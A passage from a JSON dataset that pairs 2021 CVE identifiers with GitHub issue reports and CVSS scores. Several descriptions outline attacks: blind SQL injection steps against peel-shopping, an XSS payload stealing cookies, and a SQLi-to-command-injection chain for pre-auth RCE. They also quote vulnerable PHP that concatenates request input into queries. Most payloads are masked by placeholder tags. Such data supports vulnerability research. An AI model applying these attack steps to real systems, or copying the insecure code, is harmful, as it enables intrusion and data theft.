        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-37262",
        "Issue_Url_old": "https://github.com/jflyfox/jfinal_cms/issues/23",
        "Issue_Url_new": "https://github.com/jflyfox/jfinal_cms/issues/23",
        "Repo_new": "jflyfox/jfinal_cms",
        "Issue_Created_At": "2021-06-10T19:40:20Z",
        "description": "[SECURITY] Denial of service because of unsafe regex processing. I have tried to contact you by EMAILTAG and created URLTAG asking for the contact. Nobody replied. The APITAG is vulnerable to regex injection that may lead to Denial of Service. User controlled path and APITAG are used to build and run a regex expression (first argument to APITAG URLTAG Since the attacker controls the string and the regex pattern he may cause a APITAG by regex catastrophic backtracking on the server side.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-37274",
        "Issue_Url_old": "https://github.com/purple-WL/CNVD-2020-75301/issues/1",
        "Issue_Url_new": "https://github.com/purple-wl/cnvd-2020-75301/issues/1",
        "Repo_new": "purple-wl/cnvd-2020-75301",
        "Issue_Created_At": "2021-09-25T03:51:14Z",
        "description": "Kingdee KIS Professional Edition Insecure Permissions. Vulnerability submission record APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-37381",
        "Issue_Url_old": "https://github.com/caiteli/poc_information/issues/1",
        "Issue_Url_new": "https://github.com/caiteli/poc_information/issues/1",
        "Repo_new": "caiteli/poc_information",
        "Issue_Created_At": "2021-07-28T10:24:17Z",
        "description": "letter of thanks. Thank you for your submission about southsoft GMIS NUMBERTAG has a CSRF vulnerability ( CVETAG ). After receiving the vulnerability report, we verified and confirmed its effectiveness. We will fix this vulnerability as soon as possible in subsequent versions. Southsoft APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-3747",
        "Issue_Url_old": "https://github.com/canonical/multipass/issues/2261",
        "Issue_Url_new": "https://github.com/canonical/multipass/issues/2261",
        "Repo_new": "canonical/multipass",
        "Issue_Created_At": "2021-09-28T03:23:29Z",
        "description": "placeholder. Placeholder.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-37473",
        "Issue_Url_old": "https://github.com/NavigateCMS/Navigate-CMS/issues/26",
        "Issue_Url_new": "https://github.com/navigatecms/navigate-cms/issues/26",
        "Repo_new": "navigatecms/navigate-cms",
        "Issue_Created_At": "2021-07-22T04:24:26Z",
        "description": "Multiple SQL Injection Vulnerabilities Identified in the latest version NUMBERTAG r NUMBERTAG Hi, I would like to report NUMBERTAG SQL Injection vulnerabilities identified in the latest version of the CMS. Vulnerability NUMBERTAG APITAG injection at APITAG vulnerable code: APITAG APITAG APITAG function APITAG { global $layout; global $DB; global $website; $out = ''; $item = new APITAG switch($_REQUEST FILETAG Vulnerability NUMBERTAG id at APITAG Vulnerable code APITAG : APITAG APITAG PATHTAG function APITAG { global $layout; global $DB; global $website; global $theme; global $user; $out = ''; $item = new APITAG switch($_REQUEST['act']) { case \"change_comment_status\": // change comment status if(empty($_REQUEST['id'])) { echo \"false\"; APITAG } switch($_REQUEST['opt']) { case 'publish': $DB >execute(' UPDATE nv_comments SET status NUMBERTAG WHERE website = '.$website >id.' AND APITAG id = '.$_REQUEST['id']); APITAG break; case 'unpublish': $DB >execute(' UPDATE nv_comments SET status NUMBERTAG WHERE website = '.$website >id.' AND APITAG id = '.$_REQUEST['id']); APITAG break; case 'delete': $DB >execute(' DELETE FROM nv_comments WHERE website = '.$website >id.' AND APITAG id = '.$_REQUEST['id']); APITAG break; } APITAG APITAG Attacker can use a traffic similar to: CODETAG Vulnerability NUMBERTAG APITAG at APITAG Vulnerable code APITAG APITAG PATHTAG function APITAG { global $layout; global $DB; global $website; global $theme; global $user; $out = ''; $item = new APITAG switch($_REQUEST['act']) { case 'products_order': if(!empty($_POST['products order'])) { APITAG { // save new order APITAG $response = APITAG order']); APITAG if($response!==true) { echo $response['error']; } else { echo 'true'; } } } APITAG APITAG Then it triggers ERRORTAG Vulnerability NUMBERTAG id in APITAG Vulnerable code: APITAG APITAG PATHTAG case \"change_comment_status\": if(empty($_REQUEST['id'])) { echo \"false\"; APITAG } switch($_REQUEST['opt']) { case 'publish': $DB >execute(' UPDATE nv_comments SET status NUMBERTAG APITAG WHERE website = '.$website >id.' AND id = '.$_REQUEST['id']); APITAG break; case 'unpublish': $DB >execute(' UPDATE nv_comments SET status NUMBERTAG APITAG WHERE website = '.$website >id.' AND id = '.$_REQUEST['id']); APITAG break; case 'delete': $DB >execute(' DELETE FROM nv_comments APITAG WHERE website = '.$website >id.' AND id = '.$_REQUEST['id']); APITAG break; } APITAG APITAG Attacker can easily craft something like this to trigger the vulnerability APITAG Vulnerability NUMBERTAG APITAG at APITAG vulnerable code: APITAG APITAG PATHTAG case 'load': case NUMBERTAG edit/new form if(!empty($_REQUEST['id'])) { APITAG { $item APITAG } else { $item APITAG } } if(isset($_REQUEST['form sent'])) { try { $item APITAG APITAG $item APITAG if(!empty($_REQUEST['property enabled'])) { $enableds = APITAG enabled']); } else { $enableds = APITAG } APITAG $item >id, $_REQUEST['template properties order'], $enableds); APITAG APITAG APITAG Then step into ERRORTAG Vulnerability NUMBERTAG APITAG at APITAG Vulnerable code: CODETAG Then steps into ERRORTAG Attacker can easily craft a traffic as below to cause the injection: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-37587",
        "Issue_Url_old": "https://github.com/JHUISI/charm/issues/276",
        "Issue_Url_new": "https://github.com/jhuisi/charm/issues/276",
        "Repo_new": "jhuisi/charm",
        "Issue_Created_At": "2021-07-21T14:01:46Z",
        "description": "Broken schemes in last release . Hello, At CT RSA NUMBERTAG enema and Alpar presented attacks against NUMBERTAG schemes and two of them are implemented in the last version of CHARM: DAC MACS and MA ABE YJ NUMBERTAG FILETAG FILETAG Moreover, the YCT NUMBERTAG scheme was broken in NUMBERTAG and is also implemented in CHARM: FILETAG It is possible to attack the NUMBERTAG implementations and mount decryption attacks against them. References: URLTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-37593",
        "Issue_Url_old": "https://github.com/advisto/peel-shopping/issues/3",
        "Issue_Url_new": "https://github.com/advisto/peel-shopping/issues/3",
        "Repo_new": "advisto/peel-shopping",
        "Issue_Created_At": "2021-07-11T15:58:00Z",
        "description": "SQL Injection in APITAG parameter APITAG Vulnerability Name: SQL Injection in APITAG parameter Date of Discovery NUMBERTAG July NUMBERTAG Product version NUMBERTAG Download link URLTAG Author: faisalfs NUMBERTAG ulnerability Description: Public user/guest (unauthenticated) can inject malicious SQL query in order to affect the execution of predefined SQL commands via the \"_id_\" parameter on the PATHTAG endpoint. Upon successful of SQL injection attack, attacker can read sensitive data from the database or modify database data. Vulnerable URL: _ URLTAG Proof of Concept NUMBERTAG Assumed peel shopping NUMBERTAG out of box installation database name is _peel_. This query will check if APITAG name like _hex(%peel%)_ it will delay for NUMBERTAG seconds before redirect to homepage ( URLTAG that indicates TRUE SQL statement which mean the database name like \"_peel_\". url : URLTAG FILETAG NUMBERTAG Assumed the web is using APITAG database server check if db_version like APITAG it will delay for NUMBERTAG seconds if TRUE. url : URLTAG FILETAG NUMBERTAG By default, the database have a table name = peel_produits. This query will check if table_name _peel_produits_ is exist, it will delay for NUMBERTAG seconds if TRUE, else will redirect to homepage instantly. url : URLTAG FILETAG To produce SQL syntax error, it is possible to intercept the request before it is redirect to homepage using a tool like APITAG (repeater). Error syntax: URLTAG NUMBERTAG FILETAG NUMBERTAG FILETAG Dump table name = peel_profil FILETAG Consequences: Confidentiality: Since SQL databases generally hold sensitive data, loss of confidentiality is a frequent problem with SQL Injection vulnerabilities. Integrity: Just as it may be possible to read sensitive information eg client/customer sensitive data, it is also possible to make changes or even delete this information with a SQL Injection attack. Mitigation: Use of Prepared Statements (with Parameterized Queries) References for Mitigation Vulnerability: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-37600",
        "Issue_Url_old": "https://github.com/karelzak/util-linux/issues/1395",
        "Issue_Url_new": "https://github.com/util-linux/util-linux/issues/1395",
        "Repo_new": "util-linux/util-linux",
        "Issue_Created_At": "2021-07-27T08:45:02Z",
        "description": "Potential integer overflow in ipcutils.c. Hi, It seems that there exists a potential integer overflow that can lead buffer overflows. Please find the following description NUMBERTAG APITAG can be an arbitrary large number URLTAG NUMBERTAG Call to APITAG with the structure URLTAG NUMBERTAG Call to calloc with the large integer can cause a memory allocation with an overflowed size URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-37704",
        "Issue_Url_old": "https://github.com/flextype/flextype/issues/567",
        "Issue_Url_new": "https://github.com/flextype/flextype/issues/567",
        "Repo_new": "flextype/flextype",
        "Issue_Created_At": "2021-08-12T03:43:50Z",
        "description": "phpinfo APITAG shows PHP information including values of APITAG cookies.. All NUMBERTAG ersions (prior to NUMBERTAG are affected. System Information Leak ( APITAG ) vulnerability in flextype NUMBERTAG ia the APITAG parameter to NUMBERTAG PATHTAG NUMBERTAG PATHTAG it's allows remote attackers to obtain configuration information via a phpinfo action in a request to FILETAG , which calls the phpinfo function. FILETAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-37764",
        "Issue_Url_old": "https://github.com/XOS-Shop/xos_shop_system/issues/1",
        "Issue_Url_new": "https://github.com/xos-shop/xos_shop_system/issues/1",
        "Repo_new": "xos-shop/xos_shop_system",
        "Issue_Created_At": "2021-07-24T23:10:12Z",
        "description": "Security Bug: Arbitrary File Deletion in Admin Panel. Hi MENTIONTAG , I found a file deletion vulnerability in the admin function module Vulnerability Name: Arbitrary File Deletion in Admin Panel Date of Discovery NUMBERTAG July NUMBERTAG Product version NUMBERTAG ulnerability Description: Exploiting the vulnerability allows an attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker can leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-37770",
        "Issue_Url_old": "https://github.com/NucleusCMS/NucleusCMS/issues/96",
        "Issue_Url_new": "https://github.com/nucleuscms/nucleuscms/issues/96",
        "Repo_new": "nucleuscms/nucleuscms",
        "Issue_Created_At": "2019-12-02T16:20:24Z",
        "description": "File upload vulnerability in Nucleus CMS NUMBERTAG Description: I found a file upload vulnerability. In this vulnerability, we can use upload to change the upload path to the path without. Htaccess file. Upload an. Htaccess file and write it to APITAG application / FILETAG . In this way, we can upload a picture with shell, treat it as PHP, execute our commands, so as to take down the whole website Resources and permissions for. Because I don't know why my picture can't be uploaded, so I wrote the detailed utilization process in this page, hope you can see it URLTAG I would like to submit this vulnerability to CVE mitre. I hope you can fix this vulnerability as soon as possible Looking forward to your response.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2021-37778",
        "Issue_Url_old": "https://github.com/osqzss/gps-sdr-sim/issues/294",
        "Issue_Url_new": "https://github.com/osqzss/gps-sdr-sim/issues/294",
        "Repo_new": "osqzss/gps-sdr-sim",
        "Issue_Created_At": "2021-07-23T13:23:33Z",
        "description": "There is a buffer overflow when parsing command line parameters. Hi friends! When the parameter length is greater than NUMBERTAG characters of MAX_CHAR, the strcpy function overflows. The length check can be performed to fix the problem. APITAG CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-37786",
        "Issue_Url_old": "https://github.com/admin-ch/CovidCertificate-App-iOS/issues/146",
        "Issue_Url_new": "https://github.com/admin-ch/covidcertificate-app-ios/issues/146",
        "Repo_new": "admin-ch/covidcertificate-app-ios",
        "Issue_Created_At": "2021-07-16T14:31:40Z",
        "description": "Covid Check APITAG Crash App (dos). Hello, Small issue, a person could generate a QR code readable by the application (with an invalid signature), with the parameter \"dn\" containing the value APITAG the application will crashes each time the QR code is scanned, the problem is also present on Covid Cert but less problematic, indeed a possible scenario (with a bit of social engineering) is that a person creates a QR code with the payload that crashes the application and presents it to a third party (a restaurant for example), The third party can't check the validity of the certificate because the application will crashes at each scan, the third party could let the access to these services thinking that the certificate is valid and that it's a bug of the application. APITAG maybe extreme but with a lot of chances that it works). Payload : CODETAG APITAG Payload : CODETAG FILETAG Hoping to have helped ^^",
        "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 4.6,
        "impactScore": 3.6,
        "exploitabilityScore": 0.9
    },
    {
        "CVE_ID": "CVE-2021-37791",
        "Issue_Url_old": "https://github.com/cdfan/my-admin/issues/3",
        "Issue_Url_new": "https://github.com/cdfan/my-admin/issues/3",
        "Repo_new": "cdfan/my-admin",
        "Issue_Created_At": "2021-07-28T06:35:05Z",
        "description": "There is an ultra vires vulnerability in viewing personal center. Log in with user1 account on the trial website given by the author, and click the personal center to capture the package. poc: user1 login > PATHTAG CODETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.9,
        "impactScore": 3.6,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2021-37840",
        "Issue_Url_old": "https://github.com/aaPanel/aaPanel/issues/74",
        "Issue_Url_new": "https://github.com/aapanel/aapanel/issues/74",
        "Repo_new": "aapanel/aapanel",
        "Issue_Created_At": "2021-06-23T07:11:42Z",
        "description": "Security Vulnerability in APITAG Hi, I would like to report a security vulnerability in APITAG I am not sure this is the right place as its public and visible to all, would you like me to post the details here? or email?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-37914",
        "Issue_Url_old": "https://github.com/argoproj/argo-workflows/issues/6441",
        "Issue_Url_new": "https://github.com/argoproj/argo-workflows/issues/6441",
        "Repo_new": "argoproj/argo-workflows",
        "Issue_Created_At": "2021-07-28T16:14:54Z",
        "description": "workflow re write vulnerability using input parameter. Summary It's possible to rewrite parts of a workflow on cluster using only an input parameter. Operators who allows users to run workflows specifying input parameters are vulnerable to this. Details From MENTIONTAG : It's possible to rewrite parts of a workflow on cluster using only an input parameter. This relies on taking advantage of the fact that the output of expression templates is evaluated a a literal part of the JSON stringified template. The following workflow accepts a string param, performs a trivial transformation (in this case, just printing it), and then passes the output as an env var to be printed. The poisoned param value is able to overwrite \"args\" because NUMBERTAG the golang JSON marshaler allows duplicate keys and NUMBERTAG the stringified template keys seem to be alphabetically ordered, so the poisoned \"env\" value can override the original \"args\" field. This is just a quick proof of concept. The motivated attacker could probably find a lot of different and nefarious ways to mutate a workflow. I believe this PR would close the vulnerability: URLTAG ERRORTAG Note: there seems to be some non determinism involved. The expected behavior is for the \"print\" step to output \"this happens instead\". If instead you get an error, re submit a few times. APITAG Message from the maintainers : Impacted by this bug? Give it a \ud83d\udc4d. We prioritise the issues with the most \ud83d\udc4d.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 2.5,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-3807",
        "Issue_Url_old": "https://github.com/chalk/ansi-regex/issues/38",
        "Issue_Url_new": "https://github.com/chalk/ansi-regex/issues/38",
        "Repo_new": "chalk/ansi-regex",
        "Issue_Created_At": "2021-09-14T15:37:45Z",
        "description": "Backport of security patch, for benefit of yargs. I know it's a pain in the neck, but would you consider back porting URLTAG to the NUMBERTAG release line, for the benefit of yargs URLTAG . Yargs is making the effort during the transition to ESM to support both CJS and ESM, which makes us unable to update to the latest version of APITAG . If you were willing to make an exception (_I know you're pushing folks towards using ESM exclusively_) it would be really valuable for yargs users using CJK character sets.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-38113",
        "Issue_Url_old": "https://github.com/E2OpenPlugins/e2openplugin-OpenWebif/issues/1387",
        "Issue_Url_new": "https://github.com/e2openplugins/e2openplugin-openwebif/issues/1387",
        "Repo_new": "e2openplugins/e2openplugin-openwebif",
        "Issue_Created_At": "2021-08-04T12:12:19Z",
        "description": "Stored XSS bug.. Description Inserting APITAG code into the APITAG Bouquet\" function in the Bouquet Editor leads to Stored XSS. The payload in the APITAG executes each time the user goes to the OWIF interface and redirects to a different webpage. APITAG Link to streamable URLTAG Image OS: APITAG Version NUMBERTAG Desktop Browser APITAG Version APITAG CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-38115",
        "Issue_Url_old": "https://github.com/libgd/libgd/issues/697",
        "Issue_Url_new": "https://github.com/libgd/libgd/issues/697",
        "Repo_new": "libgd/libgd",
        "Issue_Created_At": "2021-04-30T18:12:52Z",
        "description": "Read out of bound in TGA files. hello, this issue URLTAG is showing a read out of bound for a corrupted TGA FILETAG which is patched by adding some checks for APITAG . although the patch prevents occurring this vulnerability I saw that this function ( APITAG ) is used in APITAG too which there is no check for its return value again. I changed the header of the file which was used for the previous CVETAG . In fact, I changed the first byte to ff which is assigned to APITAG . FILETAG APITAG when I run the test with this input file ASAN shows this: ERRORTAG Is it showing another vulnerability?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-38138",
        "Issue_Url_old": "https://github.com/helloxz/onenav/issues/26",
        "Issue_Url_new": "https://github.com/helloxz/onenav/issues/26",
        "Repo_new": "helloxz/onenav",
        "Issue_Created_At": "2021-08-05T06:53:41Z",
        "description": "APITAG add link function exists xss vul. add link function path FILETAG input xss payload NUMBERTAG APITAG alert(\"XSS\") APITAG FILETAG click \u6dfb\u52a0 button FILETAG alert xss success input xss payload NUMBERTAG APITAG APITAG FILETAG Get user cookie success",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-38167",
        "Issue_Url_old": "https://github.com/hap-wi/roxy-wi/issues/285",
        "Issue_Url_new": "https://github.com/hap-wi/roxy-wi/issues/285",
        "Repo_new": "hap-wi/roxy-wi",
        "Issue_Created_At": "2021-08-07T10:27:37Z",
        "description": "multiple vulnerabilities leading to preauth RCE. i found haproxy wi in aws/digitalocean marketplace when i was looking for a solution to manage multiple reverse proxies, since it was opensource i peaked at how it works and found some critical issues when combined leading to pre auth RCE \\ SQL injections: Inside APITAG some SQL statements have user controlled input supplied directly into SQL queries \\ \\ Unauthenticated SQLi when an attacker request any of the pages inside APITAG folder, authentication is checked via APITAG CODETAG APITAG takes uuid cookie value and try to update expiration timestamp for the given uuid with APITAG ERRORTAG uuid cookie value is directly supplied into the query, so an unauthenticated attacker can perform a blind SQL injection to dump the database or extract a valid uuid to bypass authentication \\ \\ authenticated SQLi One example of authenticated SQLi via reaching select_servers function ERRORTAG there's multiple injection points from user supplied input here one way to reach this is from hapservers.py CODETAG this could be exploited by least privilege account such as guest There's some more functions supplying user input to SQL queries \\ Command injection: Inside APITAG and APITAG some commands executed are supplied with user input one of many examples of a second order command injection here: CODETAG haproxy_sock_port is stored in settings table, and an authenticated user can change it from APITAG then calls options page to call that function and execute arbitrary system command most cmds in different functions are prone to command injection or second order from settings stored in the database and user controlled \\ Conclusion combining both unauthenticated SQLi to grab a valid uuid and bypass authentication, then use command injection an unauthenticated user can achieve pre auth RCE",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-38197",
        "Issue_Url_old": "https://github.com/gen2brain/go-unarr/issues/21",
        "Issue_Url_new": "https://github.com/gen2brain/go-unarr/issues/21",
        "Repo_new": "gen2brain/go-unarr",
        "Issue_Created_At": "2021-08-08T06:51:14Z",
        "description": "There is a vulnerability in unarr, which will lead to path traversal vulnerability. There is a vulnerability in unarr, which will lead to path traversal vulnerability Go unarr does not check the contents of the archive. Exploit process NUMBERTAG An attacker can construct a malicious tar package (or any compressed archive file). As shown in the figure below, obviously, this will not succeed under the tar command, because the tar command fixes the vulnerability. FILETAG NUMBERTAG The victim uses go unarr to unzip the archive As shown in the figure below, path traversal occurs during go unarr decompression, and we upload the file to the.. / directory FILETAG NUMBERTAG By triggering the path traversal vulnerability, an attacker can store any file in any privileged place (which means that rce can be caused under root privileges)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-38221",
        "Issue_Url_old": "https://github.com/mlogclub/bbs-go/issues/112",
        "Issue_Url_new": "https://github.com/mlogclub/bbs-go/issues/112",
        "Repo_new": "mlogclub/bbs-go",
        "Issue_Created_At": "2021-07-08T08:49:52Z",
        "description": "There are several stored XSS vulnerabilities. Affected version NUMBERTAG all versions yet) Including Custom Edition I guess. Usage of \"v html\" tag should be really careful in vue. I found several unsafe usage in bbs go webpage which data source might be from any user. It's necessary to filter the rich text before it is posted to the client. Otherwise it will be dangerous. Here is the XSS attack example screenshot (one of them) : FILETAG And the unsafe \"v html\" tag for topic content (one of them) : FILETAG I will report the poc code after mlogclub team confirm and fix this defect.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-38290",
        "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/580",
        "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/580",
        "Repo_new": "daylightstudio/fuel-cms",
        "Issue_Created_At": "2021-08-06T01:58:06Z",
        "description": "Host header attack vulnerability exists in fuel CMS NUMBERTAG An attacker can use man in the middle attack to attack users such as phishing.. The system does not verify the host value. If the host value is modified, the link returned by the website will splice the malicious host value\u3002like this\uff1a FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2021-38311",
        "Issue_Url_old": "https://github.com/contiki-os/contiki/issues/2685",
        "Issue_Url_new": "https://github.com/contiki-os/contiki/issues/2685",
        "Repo_new": "contiki-os/contiki",
        "Issue_Created_At": "2021-08-08T13:24:15Z",
        "description": "Telnet servers potentially lead to nonterminating acknowledgment loops. Hello, In the implementation of telnet servers until version NUMBERTAG and even the latest commit NUMBERTAG b5b NUMBERTAG potential nonterminating acknowledgment loops have been found in telnet servers. In order to prevent nonterminating acknowledgment loops, one rule made by RFC NUMBERTAG URLTAG is that, a request must not be acknowledged if a party receives what appears to be the request to enter some mode it is already in. However, when the negotiated options are already disabled, servers still respond to DONT and WONT requests with WONT or DONT commands. Hence, potential infinite acknowledgment loops exist in the telnet server during execution, which may lead to denial of service and excessive CPU consumption. Could you have a check? Thanks a lot.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-38384",
        "Issue_Url_old": "https://github.com/dherault/serverless-offline/issues/1259",
        "Issue_Url_new": "https://github.com/dherault/serverless-offline/issues/1259",
        "Repo_new": "dherault/serverless-offline",
        "Issue_Created_At": "2021-08-05T18:28:59Z",
        "description": "Custom Authorizer and AWS deployed stack don't have the same behavior. Bug Report APITAG Current Behavior APITAG When using a Custom Authorizer, the behaviour of serverless offline differs from the deployed stack on AWS. Sample Code APITAG This is where we define the function event trigger. As it's clear to see, we expect a HTTP POST on APITAG file: FILETAG APITAG Our custom authorizer APITAG method looks like this. file: FILETAG CODETAG We're basically generating the following policy to someone with the role \"USER\": CODETAG Expected behavior/code APITAG When testing locally using serverless offline, fetching the endpoint URLTAG the response is NUMBERTAG Forbidden as the screenshot shows URLTAG . But when we deploy the stack to AWS, fetching the endpoint URLTAG the result is NUMBERTAG ok as its seen here URLTAG . Environment serverless version NUMBERTAG APITAG version NUMBERTAG APITAG version: APITAG OS : Linux Mint NUMBERTAG Tessa Additional APITAG APITAG We found this issue while doing the research The Fault in Our Stars URLTAG , in which we explore how API Gateway Execute API Policy works under different conditions. One researcher from our company opened the issue NUMBERTAG URLTAG where he indicates another incorrectly behaviour by serverless offline regarding the way it evaluates policies. It still lacks a response to this date.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-38386",
        "Issue_Url_old": "https://github.com/contiki-os/contiki/issues/2687",
        "Issue_Url_new": "https://github.com/contiki-os/contiki/issues/2687",
        "Repo_new": "contiki-os/contiki",
        "Issue_Created_At": "2021-08-08T13:52:04Z",
        "description": "Incorrectly executing commands of telnet servers. Telnet servers can execute many commands from clients like _ls_, _help_, _write_ and _append_. For example, the _ls_ command is able to show the contents of a certain directory in remote servers, and then servers reply executing results to clients. However, telnet servers don't correctly handle all commands. This bug could be reproduced in the case of showing the content of a directory with many files.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-38387",
        "Issue_Url_old": "https://github.com/contiki-os/contiki/issues/2688",
        "Issue_Url_new": "https://github.com/contiki-os/contiki/issues/2688",
        "Repo_new": "contiki-os/contiki",
        "Issue_Created_At": "2021-08-08T14:00:28Z",
        "description": "Silent quit of telnet servers leading to clients waiting forever. After telnet clients connect with telnet servers and send requests to servers, clients are blocked until receiving the responses from servers. So when the telnet server interrupts unexpectedly, the server should give an alert to clients. However, telnet servers often quit silently, thereby leading to clients waiting forever.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-3850",
        "Issue_Url_old": "https://github.com/ADOdb/ADOdb/issues/793",
